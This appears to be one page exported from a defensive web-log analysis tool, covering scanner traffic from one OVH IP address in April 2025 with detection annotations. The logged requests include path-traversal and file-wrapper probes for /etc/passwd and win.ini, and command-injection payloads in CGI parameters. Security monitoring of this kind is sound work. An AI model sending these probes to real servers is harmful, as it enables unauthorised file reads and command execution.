← Back to IP report

Log Explorer

Fact drill-down for 51.68.76.141

Risk 12 LOW Scope All time All-time facts 163 In-scope 163 Filtered 163 Seen 2024-11-13 → 2025-04-22

Freestyle query (contains)

Time (days, optional)

Page size 25 50 100 200

Apply Reset (all-time)

Active (none) Clear

Faceted filters (facts-based) exact core + snapshot + optional start/end

Annotation facets

Annotator (exact) (any) base — 118 trav — 15 scan_velocity — 15 sfp — 11 cmdi — 2 ua — 1 ref — 1 Severity (exact) (any) (none) — 122 34 — 10 28 — 6 44 — 6 30 — 4 26 — 4 24 — 3 36 — 2 22 — 2 8 — 2 32 — 1 9 — 1 Label (exact) (any) observed — 118 trav — 15 scan_velocity — 15 sensitive_file — 11 cmdi — 2 ref — 1 ua — 1

HTTP facets

Method (exact, case-insensitive) (any) GET — 157 POST — 6 HTTP status (exact) (any) 404 — 142 400 — 11 200 — 6 301 — 4

Snapshot facets

Subnet (exact) (any) 51.68.76.0/24 — 163 ASN (exact) (any) 16276 — 163 Country / Region / City (exact)

(any country) France — 163 (any region) Hauts-de-France — 163

(any city) Roubaix — 163

Org contains (ip_org or as_org_name)

Custom time window (optional override)

Provide start/end to scope time explicitly (overrides days). Leave blank for all-time.

Start

End

Tip: keep windows tight when you need speed, but the default is fact-complete.

Top annotators (facts, in-scope)

base 118 trav 15 scan_velocity 15 sfp 11 cmdi 2 ua 1 ref 1

Top labels (facts, in-scope)

observed 118 trav 15 scan_velocity 15 sensitive_file 11 cmdi 2 ref 1 ua 1

Click a pill to apply it as a filter.

Annotated access events

Showing page 1 / 4 — total 163 rows

← Prev Next →

#1 2025-04-22 00:10:03 event 5374049 GET 404 bytes 28426

ann sfp 8 label sensitive_file

Request File/path-style parameter observed (weak hint)

/__screenshot-error?file=/etc/passwd

referer

-

UA

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36

Annotation facts

label

sensitive_file

rule

sfp:param:file_path_hint

conf

60.00

details

A file/path/download-style parameter was present; treated as a weak correlating hint. Snippet='file/path/download param present'

More (full fields + snapshot) expand

url

/__screenshot-error?file=/etc/passwd

referer

-

UA

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36

summary

File/path-style parameter observed (weak hint)

details

A file/path/download-style parameter was present; treated as a weak correlating hint. Snippet='file/path/download param present'

subnet

51.68.76.0/24

asn

16276 — OVH SAS

geo

France, Hauts-de-France, Roubaix

org

OVH

#2 2025-04-22 00:10:03 event 5374049 GET 404 bytes 28426

ann sfp 44 label sensitive_file

Request Probe for OS credential/secret file

/__screenshot-error?file=/etc/passwd

referer

-

UA

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36

Annotation facts

label

sensitive_file

rule

sfp:file:os_secrets

conf

94.00

details

Request targeted OS credential/secret artifacts (e.g., /etc/passwd, shadow). Snippet='/__screenshot-error?file=/etc/passwd'

More (full fields + snapshot) expand

url

/__screenshot-error?file=/etc/passwd

referer

-

UA

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36

summary

Probe for OS credential/secret file

details

Request targeted OS credential/secret artifacts (e.g., /etc/passwd, shadow). Snippet='/__screenshot-error?file=/etc/passwd'

subnet

51.68.76.0/24

asn

16276 — OVH SAS

geo

France, Hauts-de-France, Roubaix

org

OVH

#3 2025-04-22 00:10:03 event 5374052 POST 301 bytes 169

ann base label observed

Request event observed

/wp-admin/admin-ajax.php

referer

-

UA

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36

Annotation facts

label

observed

rule

base_observed

conf

—

details

—

More (full fields + snapshot) expand

url

/wp-admin/admin-ajax.php

referer

-

UA

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36

summary

event observed

details

—

subnet

51.68.76.0/24

asn

16276 — OVH SAS

geo

France, Hauts-de-France, Roubaix

org

OVH

#4 2025-04-22 00:10:03 event 5374049 GET 404 bytes 28426

ann base label observed

Request event observed

/__screenshot-error?file=/etc/passwd

referer

-

UA

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36

Annotation facts

label

observed

rule

base_observed

conf

—

details

—

More (full fields + snapshot) expand

url

/__screenshot-error?file=/etc/passwd

referer

-

UA

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36

summary

event observed

details

—

subnet

51.68.76.0/24

asn

16276 — OVH SAS

geo

France, Hauts-de-France, Roubaix

org

OVH

#5 2025-04-22 00:10:02 event 5374048 GET 400 bytes 157

ann ua 8 label ua

Request Very short User-Agent string

/%2e%2e/%2e%2e/etc/passwd

referer

-

UA

-

Annotation facts

label

ua

rule

ua:very_short

conf

65.00

details

Short/generic UAs are common in basic scripts and commodity automation.

More (full fields + snapshot) expand

url

/%2e%2e/%2e%2e/etc/passwd

referer

-

UA

-

summary

Very short User-Agent string

details

Short/generic UAs are common in basic scripts and commodity automation.

subnet

51.68.76.0/24

asn

16276 — OVH SAS

geo

France, Hauts-de-France, Roubaix

org

OVH

#6 2025-04-22 00:10:02 event 5374048 GET 400 bytes 157

ann trav 28 label trav

Request Path traversal / LFI indicator detected

/%2e%2e/%2e%2e/etc/passwd

referer

-

UA

-

Annotation facts

label

trav

rule

trav:dotdot_slash

conf

92.00

details

Detected explicit traversal/LFI mechanics (dotdot segments, encoded traversal, local file / stream wrappers, or sensitive file targets). This annotator intentionally does not fire on mere URL depth or on traversal-ish parameter names without mechanics.

More (full fields + snapshot) expand

url

/%2e%2e/%2e%2e/etc/passwd

referer

-

UA

-

summary

Path traversal / LFI indicator detected

details

Detected explicit traversal/LFI mechanics (dotdot segments, encoded traversal, local file / stream wrappers, or sensitive file targets). This annotator intentionally does not fire on mere URL depth or on traversal-ish parameter names without mechanics.

subnet

51.68.76.0/24

asn

16276 — OVH SAS

geo

France, Hauts-de-France, Roubaix

org

OVH

#7 2025-04-22 00:10:02 event 5374048 GET 400 bytes 157

ann trav 30 label trav

Request Path traversal / LFI indicator detected

/%2e%2e/%2e%2e/etc/passwd

referer

-

UA

-

Annotation facts

label

trav

rule

trav:encoded_dotdot

conf

93.00

details

Detected explicit traversal/LFI mechanics (dotdot segments, encoded traversal, local file / stream wrappers, or sensitive file targets). This annotator intentionally does not fire on mere URL depth or on traversal-ish parameter names without mechanics.

More (full fields + snapshot) expand

url

/%2e%2e/%2e%2e/etc/passwd

referer

-

UA

-

summary

Path traversal / LFI indicator detected

details

Detected explicit traversal/LFI mechanics (dotdot segments, encoded traversal, local file / stream wrappers, or sensitive file targets). This annotator intentionally does not fire on mere URL depth or on traversal-ish parameter names without mechanics.

subnet

51.68.76.0/24

asn

16276 — OVH SAS

geo

France, Hauts-de-France, Roubaix

org

OVH

#8 2025-04-22 00:10:02 event 5374048 GET 400 bytes 157

ann trav 34 label trav

Request Path traversal / LFI indicator detected

/%2e%2e/%2e%2e/etc/passwd

referer

-

UA

-

Annotation facts

label

trav

rule

trav:sensitive_target

conf

95.00

details

Detected explicit traversal/LFI mechanics (dotdot segments, encoded traversal, local file / stream wrappers, or sensitive file targets). This annotator intentionally does not fire on mere URL depth or on traversal-ish parameter names without mechanics.

More (full fields + snapshot) expand

url

/%2e%2e/%2e%2e/etc/passwd

referer

-

UA

-

summary

Path traversal / LFI indicator detected

details

Detected explicit traversal/LFI mechanics (dotdot segments, encoded traversal, local file / stream wrappers, or sensitive file targets). This annotator intentionally does not fire on mere URL depth or on traversal-ish parameter names without mechanics.

subnet

51.68.76.0/24

asn

16276 — OVH SAS

geo

France, Hauts-de-France, Roubaix

org

OVH

#9 2025-04-22 00:10:02 event 5374048 GET 400 bytes 157

ann sfp 34 label sensitive_file

Request Directory traversal indicator

/%2e%2e/%2e%2e/etc/passwd

referer

-

UA

-

Annotation facts

label

sensitive_file

rule

sfp:traversal

conf

86.00

details

Traversal sequences were present (raw or encoded). Snippet='/%2e%2e/%2e%2e/etc/passwd'

More (full fields + snapshot) expand

url

/%2e%2e/%2e%2e/etc/passwd

referer

-

UA

-

summary

Directory traversal indicator

details

Traversal sequences were present (raw or encoded). Snippet='/%2e%2e/%2e%2e/etc/passwd'

subnet

51.68.76.0/24

asn

16276 — OVH SAS

geo

France, Hauts-de-France, Roubaix

org

OVH

#10 2025-04-22 00:10:02 event 5374048 GET 400 bytes 157

ann sfp 44 label sensitive_file

Request Probe for OS credential/secret file

/%2e%2e/%2e%2e/etc/passwd

referer

-

UA

-

Annotation facts

label

sensitive_file

rule

sfp:file:os_secrets

conf

94.00

details

Request targeted OS credential/secret artifacts (e.g., /etc/passwd, shadow). Snippet='/%2e%2e/%2e%2e/etc/passwd'

More (full fields + snapshot) expand

url

/%2e%2e/%2e%2e/etc/passwd

referer

-

UA

-

summary

Probe for OS credential/secret file

details

Request targeted OS credential/secret artifacts (e.g., /etc/passwd, shadow). Snippet='/%2e%2e/%2e%2e/etc/passwd'

subnet

51.68.76.0/24

asn

16276 — OVH SAS

geo

France, Hauts-de-France, Roubaix

org

OVH

#11 2025-04-22 00:10:02 event 5374046 GET 404 bytes 28426

ann sfp 36 label sensitive_file

Request Command-style parameter observed

/cgi-bin/account_mgr.cgi?cmd=cgi_user_add&name=%27;id;%27

referer

-

UA

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36

Annotation facts

label

sensitive_file

rule

sfp:param:cmd

conf

86.00

details

A command-execution style query parameter was present (cmd/exec/command/shell). Snippet='/cgi-bin/account_mgr.cgi?cmd=cgi_user_add&name=%27;id;%27'

More (full fields + snapshot) expand

url

/cgi-bin/account_mgr.cgi?cmd=cgi_user_add&name=%27;id;%27

referer

-

UA

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36

summary

Command-style parameter observed

details

A command-execution style query parameter was present (cmd/exec/command/shell). Snippet='/cgi-bin/account_mgr.cgi?cmd=cgi_user_add&name=%27;id;%27'

subnet

51.68.76.0/24

asn

16276 — OVH SAS

geo

France, Hauts-de-France, Roubaix

org

OVH

#12 2025-04-22 00:10:02 event 5374048 GET 400 bytes 157

ann scan_velocity 28 label scan_velocity

Request Scan-velocity indicator: scanv:rpm

/%2e%2e/%2e%2e/etc/passwd

referer

-

UA

-

Annotation facts

label

scan_velocity

rule

scanv:rpm

conf

90.00

details

rpm_equiv=74.0; score=14; window=90s; total=111; rpm_equiv=74.0; upm_nonstatic_equiv=25.3; 404=108/111(0.97); ext_hits=90; ua_sig=0; methods=['GET', 'POST']

More (full fields + snapshot) expand

url

/%2e%2e/%2e%2e/etc/passwd

referer

-

UA

-

summary

Scan-velocity indicator: scanv:rpm

details

rpm_equiv=74.0; score=14; window=90s; total=111; rpm_equiv=74.0; upm_nonstatic_equiv=25.3; 404=108/111(0.97); ext_hits=90; ua_sig=0; methods=['GET', 'POST']

subnet

51.68.76.0/24

asn

16276 — OVH SAS

geo

France, Hauts-de-France, Roubaix

org

OVH

#13 2025-04-22 00:10:02 event 5374048 GET 400 bytes 157

ann scan_velocity 28 label scan_velocity

Request Scan-velocity indicator: scanv:ext_enum

/%2e%2e/%2e%2e/etc/passwd

referer

-

UA

-

Annotation facts

label

scan_velocity

rule

scanv:ext_enum

conf

90.00

details

ext_hits=90; score=14; window=90s; total=111; rpm_equiv=74.0; upm_nonstatic_equiv=25.3; 404=108/111(0.97); ext_hits=90; ua_sig=0; methods=['GET', 'POST']

More (full fields + snapshot) expand

url

/%2e%2e/%2e%2e/etc/passwd

referer

-

UA

-

summary

Scan-velocity indicator: scanv:ext_enum

details

ext_hits=90; score=14; window=90s; total=111; rpm_equiv=74.0; upm_nonstatic_equiv=25.3; 404=108/111(0.97); ext_hits=90; ua_sig=0; methods=['GET', 'POST']

subnet

51.68.76.0/24

asn

16276 — OVH SAS

geo

France, Hauts-de-France, Roubaix

org

OVH

#14 2025-04-22 00:10:02 event 5374048 GET 400 bytes 157

ann scan_velocity 28 label scan_velocity

Request Scan-velocity indicator: scanv:404_ratio

/%2e%2e/%2e%2e/etc/passwd

referer

-

UA

-

Annotation facts

label

scan_velocity

rule

scanv:404_ratio

conf

90.00

details

404=108/111(0.97); score=14; window=90s; total=111; rpm_equiv=74.0; upm_nonstatic_equiv=25.3; 404=108/111(0.97); ext_hits=90; ua_sig=0; methods=['GET', 'POST']

More (full fields + snapshot) expand

url

/%2e%2e/%2e%2e/etc/passwd

referer

-

UA

-

summary

Scan-velocity indicator: scanv:404_ratio

details

404=108/111(0.97); score=14; window=90s; total=111; rpm_equiv=74.0; upm_nonstatic_equiv=25.3; 404=108/111(0.97); ext_hits=90; ua_sig=0; methods=['GET', 'POST']

subnet

51.68.76.0/24

asn

16276 — OVH SAS

geo

France, Hauts-de-France, Roubaix

org

OVH

#15 2025-04-22 00:10:02 event 5374048 GET 400 bytes 157

ann scan_velocity label scan_velocity

Request Scan-velocity window summary

/%2e%2e/%2e%2e/etc/passwd

referer

-

UA

-

Annotation facts

label

scan_velocity

rule

scanv:window

conf

—

details

window=90s; total=111; rpm_equiv=74.0; upm_nonstatic_equiv=25.3; 404=108/111(0.97); ext_hits=90; ua_sig=0; methods=['GET', 'POST']

More (full fields + snapshot) expand

url

/%2e%2e/%2e%2e/etc/passwd

referer

-

UA

-

summary

Scan-velocity window summary

details

window=90s; total=111; rpm_equiv=74.0; upm_nonstatic_equiv=25.3; 404=108/111(0.97); ext_hits=90; ua_sig=0; methods=['GET', 'POST']

subnet

51.68.76.0/24

asn

16276 — OVH SAS

geo

France, Hauts-de-France, Roubaix

org

OVH

#16 2025-04-22 00:10:02 event 5374048 GET 400 bytes 157

ann base label observed

Request event observed

/%2e%2e/%2e%2e/etc/passwd

referer

-

UA

-

Annotation facts

label

observed

rule

base_observed

conf

—

details

—

More (full fields + snapshot) expand

url

/%2e%2e/%2e%2e/etc/passwd

referer

-

UA

-

summary

event observed

details

—

subnet

51.68.76.0/24

asn

16276 — OVH SAS

geo

France, Hauts-de-France, Roubaix

org

OVH

#17 2025-04-22 00:10:02 event 5374046 GET 404 bytes 28426

ann base label observed

Request event observed

/cgi-bin/account_mgr.cgi?cmd=cgi_user_add&name=%27;id;%27

referer

-

UA

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36

Annotation facts

label

observed

rule

base_observed

conf

—

details

—

More (full fields + snapshot) expand

url

/cgi-bin/account_mgr.cgi?cmd=cgi_user_add&name=%27;id;%27

referer

-

UA

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36

summary

event observed

details

—

subnet

51.68.76.0/24

asn

16276 — OVH SAS

geo

France, Hauts-de-France, Roubaix

org

OVH

#18 2025-04-22 00:10:02 event 5374046 GET 404 bytes 28426

ann cmdi 28 label cmdi

Request Command/file-injection indicator: cmdi:op_plus_cmd

/cgi-bin/account_mgr.cgi?cmd=cgi_user_add&name=%27;id;%27

referer

-

UA

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36

Annotation facts

label

cmdi

rule

cmdi:op_plus_cmd

conf

88.00

details

Command separator/operator combined with a recognized command token. Snippet='GET /cgi-bin/account_mgr.cgi?cmd=cgi_user_add&name=';id;' -'

More (full fields + snapshot) expand

url

/cgi-bin/account_mgr.cgi?cmd=cgi_user_add&name=%27;id;%27

referer

-

UA

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36

summary

Command/file-injection indicator: cmdi:op_plus_cmd

details

Command separator/operator combined with a recognized command token. Snippet='GET /cgi-bin/account_mgr.cgi?cmd=cgi_user_add&name=';id;' -'

subnet

51.68.76.0/24

asn

16276 — OVH SAS

geo

France, Hauts-de-France, Roubaix

org

OVH

#19 2025-04-22 00:10:02 event 5374046 GET 404 bytes 28426

ann cmdi 30 label cmdi

Request Command/file-injection indicator: cmdi:param_plus_cmd

/cgi-bin/account_mgr.cgi?cmd=cgi_user_add&name=%27;id;%27

referer

-

UA

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36

Annotation facts

label

cmdi

rule

cmdi:param_plus_cmd

conf

90.00

details

Suspicious command parameter combined with a recognized command token. Snippet='GET /cgi-bin/account_mgr.cgi?cmd=cgi_user_add&name=';id;' -'

More (full fields + snapshot) expand

url

/cgi-bin/account_mgr.cgi?cmd=cgi_user_add&name=%27;id;%27

referer

-

UA

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36

summary

Command/file-injection indicator: cmdi:param_plus_cmd

details

Suspicious command parameter combined with a recognized command token. Snippet='GET /cgi-bin/account_mgr.cgi?cmd=cgi_user_add&name=';id;' -'

subnet

51.68.76.0/24

asn

16276 — OVH SAS

geo

France, Hauts-de-France, Roubaix

org

OVH

#20 2025-04-22 00:10:01 event 5374045 GET 404 bytes 28426

ann sfp 36 label sensitive_file

Request Command-style parameter observed

/cgi-bin/admin.cgi?Command=sysCommand&Cmd=ifconfig

referer

-

UA

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36

Annotation facts

label

sensitive_file

rule

sfp:param:cmd

conf

86.00

details

A command-execution style query parameter was present (cmd/exec/command/shell). Snippet='/cgi-bin/admin.cgi?Command=sysCommand&Cmd=ifconfig'

More (full fields + snapshot) expand

url

/cgi-bin/admin.cgi?Command=sysCommand&Cmd=ifconfig

referer

-

UA

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36

summary

Command-style parameter observed

details

A command-execution style query parameter was present (cmd/exec/command/shell). Snippet='/cgi-bin/admin.cgi?Command=sysCommand&Cmd=ifconfig'

subnet

51.68.76.0/24

asn

16276 — OVH SAS

geo

France, Hauts-de-France, Roubaix

org

OVH

#21 2025-04-22 00:10:01 event 5374045 GET 404 bytes 28426

ann base label observed

Request event observed

/cgi-bin/admin.cgi?Command=sysCommand&Cmd=ifconfig

referer

-

UA

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36

Annotation facts

label

observed

rule

base_observed

conf

—

details

—

More (full fields + snapshot) expand

url

/cgi-bin/admin.cgi?Command=sysCommand&Cmd=ifconfig

referer

-

UA

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36

summary

event observed

details

—

subnet

51.68.76.0/24

asn

16276 — OVH SAS

geo

France, Hauts-de-France, Roubaix

org

OVH

#22 2025-04-22 00:10:01 event 5374044 POST 404 bytes 28426

ann base label observed

Request event observed

/classes/common/busiFacade.php

referer

-

UA

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36

Annotation facts

label

observed

rule

base_observed

conf

—

details

—

More (full fields + snapshot) expand

url

/classes/common/busiFacade.php

referer

-

UA

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36

summary

event observed

details

—

subnet

51.68.76.0/24

asn

16276 — OVH SAS

geo

France, Hauts-de-France, Roubaix

org

OVH

#23 2025-04-22 00:10:00 event 5374041 GET 404 bytes 28426

ann base label observed

Request event observed

/php/ztp_gate.php/.js.map

referer

-

UA

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36

Annotation facts

label

observed

rule

base_observed

conf

—

details

—

More (full fields + snapshot) expand

url

/php/ztp_gate.php/.js.map

referer

-

UA

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36

summary

event observed

details

—

subnet

51.68.76.0/24

asn

16276 — OVH SAS

geo

France, Hauts-de-France, Roubaix

org

OVH

#24 2025-04-22 00:09:59 event 5374040 GET 404 bytes 28426

ann trav 32 label trav

Request Path traversal / LFI indicator detected

/file=c:%5Cwindows%5Cwin.ini

referer

-

UA

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36

Annotation facts

label

trav

rule

trav:windows_sensitive_target

conf

94.00

details

Detected explicit traversal/LFI mechanics (dotdot segments, encoded traversal, local file / stream wrappers, or sensitive file targets). This annotator intentionally does not fire on mere URL depth or on traversal-ish parameter names without mechanics.

More (full fields + snapshot) expand

url

/file=c:%5Cwindows%5Cwin.ini

referer

-

UA

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36

summary

Path traversal / LFI indicator detected

details

Detected explicit traversal/LFI mechanics (dotdot segments, encoded traversal, local file / stream wrappers, or sensitive file targets). This annotator intentionally does not fire on mere URL depth or on traversal-ish parameter names without mechanics.

subnet

51.68.76.0/24

asn

16276 — OVH SAS

geo

France, Hauts-de-France, Roubaix

org

OVH

#25 2025-04-22 00:09:59 event 5374039 GET 404 bytes 28426

ann sfp 44 label sensitive_file

Request Probe for OS credential/secret file

/file=/etc/passwd

referer

-

UA

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36

Annotation facts

label

sensitive_file

rule

sfp:file:os_secrets

conf

94.00

details

Request targeted OS credential/secret artifacts (e.g., /etc/passwd, shadow). Snippet='/file=/etc/passwd'

More (full fields + snapshot) expand

url

/file=/etc/passwd

referer

-

UA

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36

summary

Probe for OS credential/secret file

details

Request targeted OS credential/secret artifacts (e.g., /etc/passwd, shadow). Snippet='/file=/etc/passwd'

subnet

51.68.76.0/24

asn

16276 — OVH SAS

geo

France, Hauts-de-France, Roubaix

org

OVH

#26 2025-04-22 00:09:59 event 5374040 GET 404 bytes 28426

ann base label observed

Request event observed

/file=c:%5Cwindows%5Cwin.ini

referer

-

UA

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36

Annotation facts

label

observed

rule

base_observed

conf

—

details

—

More (full fields + snapshot) expand

url

/file=c:%5Cwindows%5Cwin.ini

referer

-

UA

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36

summary

event observed

details

—

subnet

51.68.76.0/24

asn

16276 — OVH SAS

geo

France, Hauts-de-France, Roubaix

org

OVH

#27 2025-04-22 00:09:59 event 5374039 GET 404 bytes 28426

ann base label observed

Request event observed

/file=/etc/passwd

referer

-

UA

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36

Annotation facts

label

observed

rule

base_observed

conf

—

details

—

More (full fields + snapshot) expand

url

/file=/etc/passwd

referer

-

UA

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36

summary

event observed

details

—

subnet

51.68.76.0/24

asn

16276 — OVH SAS

geo

France, Hauts-de-France, Roubaix

org

OVH

#28 2025-04-22 00:09:58 event 5374038 GET 404 bytes 28426

ann sfp 44 label sensitive_file

Request Probe for OS credential/secret file

/interview?i=/etc/passwd

referer

-

UA

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36

Annotation facts

label

sensitive_file

rule

sfp:file:os_secrets

conf

94.00

details

Request targeted OS credential/secret artifacts (e.g., /etc/passwd, shadow). Snippet='/interview?i=/etc/passwd'

More (full fields + snapshot) expand

url

/interview?i=/etc/passwd

referer

-

UA

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36

summary

Probe for OS credential/secret file

details

Request targeted OS credential/secret artifacts (e.g., /etc/passwd, shadow). Snippet='/interview?i=/etc/passwd'

subnet

51.68.76.0/24

asn

16276 — OVH SAS

geo

France, Hauts-de-France, Roubaix

org

OVH

#29 2025-04-22 00:09:58 event 5374038 GET 404 bytes 28426

ann base label observed

Request event observed

/interview?i=/etc/passwd

referer

-

UA

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36

Annotation facts

label

observed

rule

base_observed

conf

—

details

—

More (full fields + snapshot) expand

url

/interview?i=/etc/passwd

referer

-

UA

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36

summary

event observed

details

—

subnet

51.68.76.0/24

asn

16276 — OVH SAS

geo

France, Hauts-de-France, Roubaix

org

OVH

#30 2025-04-22 00:09:57 event 5374037 GET 404 bytes 28426

ann base label observed

Request event observed

/device/config

referer

-

UA

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36

Annotation facts

label

observed

rule

base_observed

conf

—

details

—

More (full fields + snapshot) expand

url

/device/config

referer

-

UA

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36

summary

event observed

details

—

subnet

51.68.76.0/24

asn

16276 — OVH SAS

geo

France, Hauts-de-France, Roubaix

org

OVH

#31 2025-04-22 00:09:57 event 5374036 GET 404 bytes 28426

ann base label observed

Request event observed

/system/config_menu.htm

referer

-

UA

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36

Annotation facts

label

observed

rule

base_observed

conf

—

details

—

More (full fields + snapshot) expand

url

/system/config_menu.htm

referer

-

UA

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36

summary

event observed

details

—

subnet

51.68.76.0/24

asn

16276 — OVH SAS

geo

France, Hauts-de-France, Roubaix

org

OVH

#32 2025-04-22 00:09:56 event 5374034 GET 200 bytes 27853

ann trav 30 label trav

Request Path traversal / LFI indicator detected

/?p=3232&wp_automatic=download&link=file:///etc/passwd

referer

-

UA

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36

Annotation facts

label

trav

rule

trav:wrapper

conf

94.00

details

Detected explicit traversal/LFI mechanics (dotdot segments, encoded traversal, local file / stream wrappers, or sensitive file targets). This annotator intentionally does not fire on mere URL depth or on traversal-ish parameter names without mechanics.

More (full fields + snapshot) expand

url

/?p=3232&wp_automatic=download&link=file:///etc/passwd

referer

-

UA

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36

summary

Path traversal / LFI indicator detected

details

Detected explicit traversal/LFI mechanics (dotdot segments, encoded traversal, local file / stream wrappers, or sensitive file targets). This annotator intentionally does not fire on mere URL depth or on traversal-ish parameter names without mechanics.

subnet

51.68.76.0/24

asn

16276 — OVH SAS

geo

France, Hauts-de-France, Roubaix

org

OVH

#33 2025-04-22 00:09:56 event 5374034 GET 200 bytes 27853

ann sfp 44 label sensitive_file

Request Probe for OS credential/secret file

/?p=3232&wp_automatic=download&link=file:///etc/passwd

referer

-

UA

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36

Annotation facts

label

sensitive_file

rule

sfp:file:os_secrets

conf

94.00

details

Request targeted OS credential/secret artifacts (e.g., /etc/passwd, shadow). Snippet='/?p=3232&wp_automatic=download&link=file:///etc/passwd'

More (full fields + snapshot) expand

url

/?p=3232&wp_automatic=download&link=file:///etc/passwd

referer

-

UA

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36

summary

Probe for OS credential/secret file

details

Request targeted OS credential/secret artifacts (e.g., /etc/passwd, shadow). Snippet='/?p=3232&wp_automatic=download&link=file:///etc/passwd'

subnet

51.68.76.0/24

asn

16276 — OVH SAS

geo

France, Hauts-de-France, Roubaix

org

OVH

